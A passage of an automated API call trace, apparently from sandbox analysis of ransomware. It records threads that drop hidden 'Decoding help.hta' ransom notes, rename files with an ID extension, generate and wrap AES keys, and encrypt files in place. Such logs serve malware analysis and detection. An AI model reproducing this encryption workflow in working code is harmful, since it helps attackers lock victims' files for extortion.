dwFlags=0x0) returned 1 [0060.940] SetFilePointerEx (in: hFile=0x94c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.940] WriteFile (in: hFile=0x94c, lpBuffer=0x1fa9fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1fa9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1fa9fbe4*, lpNumberOfBytesWritten=0x1fa9fcf8*=0x100, lpOverlapped=0x0) returned 1 [0060.941] WriteFile (in: hFile=0x94c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1fa9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1fa9fcf8*=0x500, lpOverlapped=0x0) returned 1 [0060.941] CloseHandle (hObject=0x94c) returned 1 [0060.941] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0060.942] FindNextFileW (in: hFindFile=0x671bb0, lpFindFileData=0x1fa9fd30 | out: lpFindFileData=0x1fa9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0060.942] FindClose (in: hFindFile=0x671bb0 | out: hFindFile=0x671bb0) returned 1 Thread: id = 744 os_tid = 0xfe8 [0054.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*", lpFindFileData=0x1fb9fd30 | out: lpFindFileData=0x1fb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc59d0 [0060.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.376] FindNextFileW (in: hFindFile=0x10bc59d0, lpFindFileData=0x1fb9fd30 | out: lpFindFileData=0x1fb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.376] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.376] FindNextFileW (in: hFindFile=0x10bc59d0, lpFindFileData=0x1fb9fd30 | out: lpFindFileData=0x1fb9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0060.376] lstrcpyW (in: lpString1=0x10d56ab0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*" [0060.376] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*") returned 64 [0060.376] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Decoding help.hta" [0060.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta")) returned 0xffffffff [0060.376] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbd0 [0061.583] WriteFile (in: hFile=0xbd0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1fb9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1fb9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.584] CloseHandle (hObject=0xbd0) returned 1 [0061.584] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 745 os_tid = 0xfec [0054.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a218f10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5fca3e0 [0058.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.357] FindNextFileW (in: hFindFile=0x5fca3e0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcc07b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a218f10, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.357] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.357] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.357] FindNextFileW (in: hFindFile=0x5fca3e0, lpFindFileData=0x1fc9fd30 | out: lpFindFileData=0x1fc9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532ebf00, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x532ebf00, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x532ebf00, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0058.358] lstrcpyW (in: lpString1=0x107f81f0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0058.358] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 123 [0058.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" [0058.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\decoding help.hta")) returned 0x20 [0058.358] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.358] lstrlenW (lpString="cab1.cab") returned 8 [0058.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*" [0058.358] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*") returned 123 [0058.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0058.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0058.358] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb7c [0058.365] CreateFileMappingA (hFile=0xb7c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb80 [0058.365] CryptAcquireContextA (in: phProv=0x1fc9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1fc9fcec*=0x2aac5a28) returned 1 [0060.206] CryptGenKey (in: hProv=0x2aac5a28, Algid=0x6610, dwFlags=0x1, phKey=0x1fc9fce8 | out: phKey=0x1fc9fce8*=0x5fca420) returned 1 [0060.206] CryptExportKey (in: hKey=0x5fca420, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1fc9fbe4, pdwDataLen=0x1fc9fce4 | out: pbData=0x1fc9fbe4*, pdwDataLen=0x1fc9fce4*=0x2c) returned 1 [0060.206] MapViewOfFile (hFileMappingObject=0xb80, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x13720000 [0065.089] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1fc9fbe4*, pdwDataLen=0x1fc9fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1fc9fbe4*, pdwDataLen=0x1fc9fcf8*=0x100) returned 1 [0065.090] CryptEncrypt (hKey=0x5fca420, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x13720000, pdwDataLen=0x1fc9fce4*=0x100000, dwBufLen=0x100000) Thread: id = 746 os_tid = 0xff0 [0054.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*", lpFindFileData=0x1fd9fd30 | out: lpFindFileData=0x1fd9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db8f8 [0056.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.853] FindNextFileW (in: hFindFile=0x5db8f8, lpFindFileData=0x1fd9fd30 | out: lpFindFileData=0x1fd9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.853] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.853] FindNextFileW (in: hFindFile=0x5db8f8, lpFindFileData=0x1fd9fd30 | out: lpFindFileData=0x1fd9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.853] lstrcpyW (in: lpString1=0x10960808, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*" [0056.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*") returned 63 [0056.854] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Decoding help.hta" [0056.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\decoding help.hta")) returned 0xffffffff [0056.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb6c [0058.353] WriteFile (in: hFile=0xb6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1fd9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1fd9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.354] CloseHandle (hObject=0xb6c) returned 1 [0058.354] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.354] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*" [0058.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\*.*") returned 63 [0058.354] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" [0058.354] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" [0058.355] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb6c [0058.355] CreateFileMappingA (hFile=0xb6c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb70 [0058.355] CryptAcquireContextA (in: phProv=0x1fd9fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1fd9fcec*=0x2aac59a0) returned 1 [0060.205] CryptGenKey (in: hProv=0x2aac59a0, Algid=0x6610, dwFlags=0x1, phKey=0x1fd9fce8 | out: phKey=0x1fd9fce8*=0x5fca3a0) returned 1 [0060.205] CryptExportKey (in: hKey=0x5fca3a0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1fd9fbe4, pdwDataLen=0x1fd9fce4 | out: pbData=0x1fd9fbe4*, pdwDataLen=0x1fd9fce4*=0x2c) returned 1 [0060.205] MapViewOfFile (hFileMappingObject=0xb70, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.224] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1fd9fbe4*, pdwDataLen=0x1fd9fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1fd9fbe4*, pdwDataLen=0x1fd9fcf8*=0x100) returned 1 [0064.224] CryptEncrypt (in: hKey=0x5fca3a0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x1fd9fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x1fd9fce4*=0x140) returned 1 [0064.224] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.226] CloseHandle (hObject=0xb70) returned 1 [0064.226] CryptDestroyKey (hKey=0x5fca3a0) returned 1 [0064.226] CryptReleaseContext (hProv=0x2aac59a0, dwFlags=0x0) returned 1 [0064.226] SetFilePointerEx (in: hFile=0xb6c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.226] WriteFile (hFile=0xb6c, lpBuffer=0x1fd9fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1fd9fcf8, lpOverlapped=0x0) Thread: id = 747 os_tid = 0xff4 [0054.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*", lpFindFileData=0x1fe9fd30 | out: lpFindFileData=0x1fe9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc658 [0059.391] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.391] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x1fe9fd30 | out: lpFindFileData=0x1fe9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.391] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.391] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.391] FindNextFileW (in: hFindFile=0x10fbc658, lpFindFileData=0x1fe9fd30 | out: lpFindFileData=0x1fe9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.391] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*" [0059.391] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*") returned 64 [0059.391] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\", lpString2="Decoding help.hta" | out: 